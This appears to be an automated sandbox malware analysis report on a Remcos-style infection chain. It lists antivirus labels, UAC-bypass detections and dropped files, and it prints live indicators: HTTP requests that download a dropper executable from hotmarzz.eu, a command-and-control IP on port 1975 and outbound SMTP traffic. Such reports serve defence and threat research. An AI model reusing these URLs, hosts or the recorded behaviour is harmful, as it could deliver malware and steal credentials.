                    Source: 44.2.Windows Update.exe.400000.2.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 40.2.5.exe.3753258.5.unpackAvira: Label: TR/Inject.vcoldi
                    Source: 44.0.Windows Update.exe.400000.8.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 44.0.Windows Update.exe.400000.8.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 13.3.remcos.exe.295a000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 41.0.4.exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                    Source: 39.0.21.exe.400000.4.unpackAvira: Label: TR/Dropper.Gen
                    Source: 40.0.5.exe.400000.9.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 40.0.5.exe.400000.9.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 44.1.Windows Update.exe.415058.2.unpackAvira: Label: TR/Inject.vcoldi
                    Source: 44.1.Windows Update.exe.400000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 44.1.Windows Update.exe.400000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 29.2.bin.exe.d0000.0.unpackAvira: Label: TR/Redcap.ghjpt
                    Source: 39.0.21.exe.400000.7.unpackAvira: Label: TR/Dropper.Gen
                    Source: 36.2.21.exe.14770000.1.unpackAvira: Label: TR/Dropper.Gen
                    Source: 35.0.dwn.exe.5af305.1.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 41.1.4.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                    Source: 13.3.remcos.exe.295a000.1.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 41.2.4.exe.400000.1.unpackAvira: Label: TR/Spy.Gen8
                    Source: 40.2.5.exe.4970000.15.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 40.2.5.exe.4970000.15.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 44.0.Windows Update.exe.400000.6.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 44.0.Windows Update.exe.400000.6.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 39.0.21.exe.400000.5.unpackAvira: Label: TR/Dropper.Gen
                    Source: 40.0.5.exe.400000.5.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 40.0.5.exe.400000.5.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 40.0.5.exe.400000.13.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 40.0.5.exe.400000.13.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 39.0.21.exe.400000.8.unpackAvira: Label: TR/Dropper.Gen
                    Source: 44.0.Windows Update.exe.400000.7.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 44.0.Windows Update.exe.400000.7.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 44.2.Windows Update.exe.4b40000.16.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 44.2.Windows Update.exe.4b40000.16.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 40.0.5.exe.400000.7.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 40.0.5.exe.400000.7.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 37.2.5.exe.14901458.4.unpackAvira: Label: TR/Inject.vcoldi
                    Source: 35.0.dwn.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
                    Source: 41.0.4.exe.400000.5.unpackAvira: Label: TR/Spy.Gen8
                    Source: 41.0.4.exe.400000.11.unpackAvira: Label: TR/Spy.Gen8
                    Source: 35.2.dwn.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
                    Source: 35.2.dwn.exe.4df189.3.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 40.0.5.exe.415058.15.unpackAvira: Label: TR/Inject.vcoldi
                    Source: 41.0.4.exe.400000.9.unpackAvira: Label: TR/Spy.Gen8
                    Source: 35.0.dwn.exe.4df189.2.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 1.2.xxTzyGLZx5.exe.147a0000.2.unpackAvira: Label: TR/Dropper.Gen
                    Source: 39.1.21.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
                    Source: 44.2.Windows Update.exe.415058.0.unpackAvira: Label: TR/Inject.vcoldi
                    Source: 41.0.4.exe.400000.6.unpackAvira: Label: TR/Spy.Gen8
                    Source: 44.0.Windows Update.exe.400000.13.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 44.0.Windows Update.exe.400000.13.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 40.2.5.exe.400000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 40.2.5.exe.400000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 44.2.Windows Update.exe.4ab0000.13.unpackAvira: Label: TR/Inject.vcoldi
                    Source: 35.0.dwn.exe.4031bf.3.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 29.0.bin.exe.d0000.0.unpackAvira: Label: TR/Redcap.ghjpt
                    Source: 3.2.bin.exe.d0000.0.unpackAvira: Label: TR/Redcap.ghjpt
                    Source: 35.2.dwn.exe.4031bf.1.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 40.0.5.exe.400000.4.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 40.0.5.exe.400000.4.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 44.0.Windows Update.exe.400000.9.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 44.0.Windows Update.exe.400000.9.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 41.0.4.exe.400000.7.unpackAvira: Label: TR/Spy.Gen8
                    Source: 2.1.xxTzyGLZx5.exe.400000.0.unpackAvira: Label: TR/Redcap.ghjpt
                    Source: 2.1.xxTzyGLZx5.exe.400000.0.unpackAvira: Label: TR/Redcap.ghjpt
                    Source: 40.2.5.exe.415058.3.unpackAvira: Label: TR/Inject.vcoldi
                    Source: 40.1.5.exe.415058.3.unpackAvira: Label: TR/Inject.vcoldi
                    Source: 44.0.Windows Update.exe.400000.5.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 44.0.Windows Update.exe.400000.5.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 44.0.Windows Update.exe.415058.12.unpackAvira: Label: TR/Inject.vcoldi
                    Source: 44.2.Windows Update.exe.3883258.7.unpackAvira: Label: TR/Inject.vcoldi
                    Source: 40.2.5.exe.48e0000.14.unpackAvira: Label: TR/Inject.vcoldi
                    Source: 40.0.5.exe.415058.11.unpackAvira: Label: TR/Inject.vcoldi
                    Source: 37.2.5.exe.148f0000.1.unpackAvira: Label: TR/Inject.vcoldi
                    Source: 41.0.4.exe.400000.8.unpackAvira: Label: TR/Spy.Gen8
                    Source: 44.0.Windows Update.exe.400000.4.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 44.0.Windows Update.exe.400000.4.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 2.2.xxTzyGLZx5.exe.400000.0.unpackAvira: Label: TR/Redcap.ghjpt
                    Source: 2.2.xxTzyGLZx5.exe.400000.0.unpackAvira: Label: TR/Redcap.ghjpt
                    Source: 43.2.Windows Update.exe.147a0000.4.unpackAvira: Label: TR/Inject.vcoldi
                    Source: 39.2.21.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
                    Source: 40.0.5.exe.400000.8.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 40.0.5.exe.400000.8.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 41.2.4.exe.2520000.4.unpackAvira: Label: TR/Spy.Gen8
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_0042F31F CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,4_2_0042F31F
                    Source: xxTzyGLZx5.exe, 00000001.00000002.677784097.00000000147A0000.00000004.00000001.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----

                    Exploits:

                    barindex
                    Yara detected UACMe UAC Bypass toolShow sources
                    Source: Yara matchFile source: 2.2.xxTzyGLZx5.exe.4031bf.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.0.bin.exe.d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.xxTzyGLZx5.exe.41b62f.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.bin.exe.2cee490.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.cmd.exe.690000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.cmd.exe.690000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.2.bin.exe.d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.xxTzyGLZx5.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.3.xxTzyGLZx5.exe.7abf78.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.xxTzyGLZx5.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.bin.exe.3644490.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.xxTzyGLZx5.exe.4031bf.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.1.xxTzyGLZx5.exe.4031bf.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.xxTzyGLZx5.exe.147ba62f.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.xxTzyGLZx5.exe.147a21bf.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.xxTzyGLZx5.exe.4031bf.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.xxTzyGLZx5.exe.147a0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.3.bin.exe.d4d388.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.0.bin.exe.d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.bin.exe.d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.xxTzyGLZx5.exe.147a21bf.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000003.684193866.0000000000D36000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.929833680.000000000021F000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000001.674846942.0000000000403000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000000.726336718.000000000021F000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000002.730907039.000000000021F000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.684269184.0000000000D36000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.677784097.00000000147A0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000000.672609321.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000000.674013020.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.931995653.0000000000690000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.939479958.000000000362C000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.682814093.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.684248310.0000000000D0E000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000002.731576486.00000000034A2000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000003.676858560.0000000000797000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.939106389.0000000002CD6000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000000.680273151.000000000021F000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: xxTzyGLZx5.exe PID: 6780, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: xxTzyGLZx5.exe PID: 7008, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: bin.exe PID: 7116, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: bin.exe PID: 6472, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED

                    Compliance:

                    barindex
                    Detected unpacking (creates a PE file in dynamic memory)Show sources
                    Source: C:\Users\user\AppData\Local\Temp\5.exeUnpacked PE file: 40.2.5.exe.4970000.15.unpack
                    Source: C:\Users\user\AppData\Local\Temp\4.exeUnpacked PE file: 41.2.4.exe.2520000.4.unpack
                    Source: xxTzyGLZx5.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                    Source: C:\Users\user\AppData\Local\Temp\5.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
                    Source: unknownHTTPS traffic detected: 81.88.52.165:443 -> 192.168.2.4:49739 version: TLS 1.2
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeDirectory created: C:\Program Files\Microsoft DN1Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeDirectory created: C:\Program Files\Microsoft DN1\sqlmap.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeDirectory created: C:\Program Files\Microsoft DN1\rdpwrap.iniJump to behavior
                    Source: Binary string: wntdll.pdbUGP source: xxTzyGLZx5.exe, 00000001.00000003.670539145.00000000149D0000.00000004.00000001.sdmp, xxTzyGLZx5.exe, 00000001.00000003.674258624.0000000014840000.00000004.00000001.sdmp
                    Source: Binary string: wntdll.pdb source: xxTzyGLZx5.exe, 00000001.00000003.670539145.00000000149D0000.00000004.00000001.sdmp, xxTzyGLZx5.exe, 00000001.00000003.674258624.0000000014840000.00000004.00000001.sdmp
                    Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: bin.exe, 00000003.00000003.840888944.00000000046E1000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.840241692.0000000000D93000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.840177868.0000000000D85000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.943517281.0000000004128000.00000004.00000010.sdmp, bin.exe, 00000003.00000003.846003061.00000000047E0000.00000040.00000001.sdmp, bin.exe, 00000003.00000003.839090036.0000000000D76000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.839114022.0000000000D84000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.945019121.0000000004876000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.943929284.00000000041B9000.00000004.00000010.sdmp, bin.exe, 00000003.00000003.840539619.00000000046EF000.00000004.00000001.sdmp
                    Source: Binary string: wuser32.pdb source: bin.exe, 00000003.00000002.939597757.0000000003B7F000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.940953351.0000000003F90000.00000040.00000001.sdmp
                    Source: Binary string: wuser32.pdbUGP source: bin.exe, 00000003.00000002.939597757.0000000003B7F000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.940953351.0000000003F90000.00000040.00000001.sdmp
                    Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: bin.exe, 00000003.00000003.840888944.00000000046E1000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.840241692.0000000000D93000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.840177868.0000000000D85000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.943517281.0000000004128000.00000004.00000010.sdmp, bin.exe, 00000003.00000003.846003061.00000000047E0000.00000040.00000001.sdmp, bin.exe, 00000003.00000003.839090036.0000000000D76000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.839114022.0000000000D84000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.945019121.0000000004876000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.943929284.00000000041B9000.00000004.00000010.sdmp, bin.exe, 00000003.00000003.840539619.00000000046EF000.00000004.00000001.sdmp
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_00406AEE SetEvent,ShellExecuteW,GetLogicalDriveStringsA,StrToIntA,CreateDirectoryW,GetFileAttributesW,DeleteFileW,4_2_00406AEE
                    Source: C:\Users\user\AppData\Local\Temp\21.exeFile opened: C:\Users\user\AppData\Roaming
                    Source: C:\Users\user\AppData\Local\Temp\21.exeFile opened: C:\Users\user
                    Source: C:\Users\user\AppData\Local\Temp\21.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                    Source: C:\Users\user\AppData\Local\Temp\21.exeFile opened: C:\Users\user\AppData
                    Source: C:\Users\user\AppData\Local\Temp\21.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                    Source: C:\Users\user\AppData\Local\Temp\21.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_00405250
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_00405C22 FindFirstFileA,FindClose,1_2_00405C22
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_00402630 FindFirstFileA,1_2_00402630
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_0040A047 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,4_2_0040A047
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_00418144 FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,4_2_00418144
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_0040A262 FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,4_2_0040A262
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_00406360 FindFirstFileW,FindNextFileW,4_2_00406360
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_0040783D __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,4_2_0040783D
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_00407C95 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,4_2_00407C95
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_00447D49 FindFirstFileExA,4_2_00447D49
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_00415DC8 FindFirstFileW,FindNextFileW,FindNextFileW,4_2_00415DC8

                    Networking:

                    barindex
                    Connects to many ports of the same IP (likely port scanning)Show sources
                    Source: global trafficTCP traffic: 185.157.161.174 ports 1,1975,9090,5,7,9
                    May check the online IP address of the machineShow sources
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeDNS query: name: whatismyipaddress.com
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeDNS query: name: whatismyipaddress.com
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeDNS query: name: whatismyipaddress.com
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeDNS query: name: whatismyipaddress.com
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeDNS query: name: whatismyipaddress.com
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /goods/Droppertodownloa.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: hotmarzz.eu
                    Source: global trafficHTTP traffic detected: GET /goods/Droppertodownloa.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: hotmarzz.euConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /goods/Droppertodownloa.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: hotmarzz.euConnection: Keep-Alive
                    Source: global trafficTCP traffic: 192.168.2.4:49726 -> 185.157.161.174:1975
                    Source: global trafficTCP traffic: 192.168.2.4:49767 -> 66.29.159.53:587
                    Source: global trafficTCP traffic: 192.168.2.4:49767 -> 66.29.159.53:587
                    Source: remcos.exe, 0000000D.00000002.938448176.0000000002987000.00000004.00000010.sdmp, remcos.exe, 0000000D.00000003.752833518.000000000295A000.00000004.00000010.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: bin.exe, 00000003.00000002.932281171.0000000000CEA000.00000004.00000020.sdmp, bin.exe, 00000003.00000003.706516335.0000000000D61000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.706451948.0000000000D34000.00000004.00000001.sdmpString found in binary or memory: http://hotmarzz.eu/goods/Droppertodownloa.exe
                    Source: bin.exe, 00000003.00000003.706516335.0000000000D61000.00000004.00000001.sdmpString found in binary or memory: http://hotmarzz.eu/goods/Droppertodownloa.exeOZ
                    Source: bin.exe, 00000003.00000002.932281171.0000000000CEA000.00000004.00000020.sdmpString found in binary or memory: http://hotmarzz.eu/goods/Droppertodownloa.exeW
                    Source: bin.exe, 00000003.00000002.932281171.0000000000CEA000.00000004.00000020.sdmpString found in binary or memory: http://hotmarzz.eu/goods/Droppertodownloa.exem
                    Source: xxTzyGLZx5.exe, xxTzyGLZx5.exe, 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp, xxTzyGLZx5.exe, 00000001.00000000.660567886.0000000000409000.00000008.00020000.sdmp, xxTzyGLZx5.exe, 00000002.00000000.666223896.0000000000409000.00000008.00020000.sdmp, dwn.exe, 00000023.00000000.746840161.0000000000403000.00000002.00020000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
                    Source: xxTzyGLZx5.exe, 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp, xxTzyGLZx5.exe, 00000001.00000000.660567886.0000000000409000.00000008.00020000.sdmp, xxTzyGLZx5.exe, 00000002.00000000.666223896.0000000000409000.00000008.00020000.sdmp, dwn.exe, 00000023.00000000.746840161.0000000000403000.00000002.00020000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                    Source: remcos.exe, 0000001F.00000003.752013552.0000000002255000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.752875827.0000000002255000.00000004.00000001.sdmpString found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
                    Source: bin.exe, 00000003.00000003.834239549.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.710177902.0000000000D92000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.706849187.0000000000D94000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.833594602.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.706749512.0000000000D85000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.707065597.0000000000D76000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.706915581.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.837896441.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.706804145.0000000000D76000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.840339214.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.840815715.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.833909279.0000000000D93000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.845234590.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.720653514.0000000000D92000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.932808488.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.709580311.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.837181130.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.706772725.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.833790621.0000000000D93000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.834673194.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.707076421.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.706791322.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.706882027.0000000000D85000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.833519937.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.834003178.0000000000D85000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.720698264.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.706821542.0000000000DC0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.845559560.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.710039428.0000000000D92000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.709560738.0000000000D85000.00000004.00000001.sdmpString found in binary or memory: http://stascorp.comDVarFileInfo$
                    Source: remcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                    Source: remcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
                    Source: remcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
                    Source: remcos.exe, 0000001F.00000002.756308956.0000000000193000.00000004.00000001.sdmpString found in binary or memory: http://www.nirsoft.net
                    Source: remcos.exe, 0000001F.00000002.756430645.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.nirsoft.net/
                    Source: remcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;g
                    Source: remcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.747996297.0000000002248000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094
                    Source: remcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmpString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9
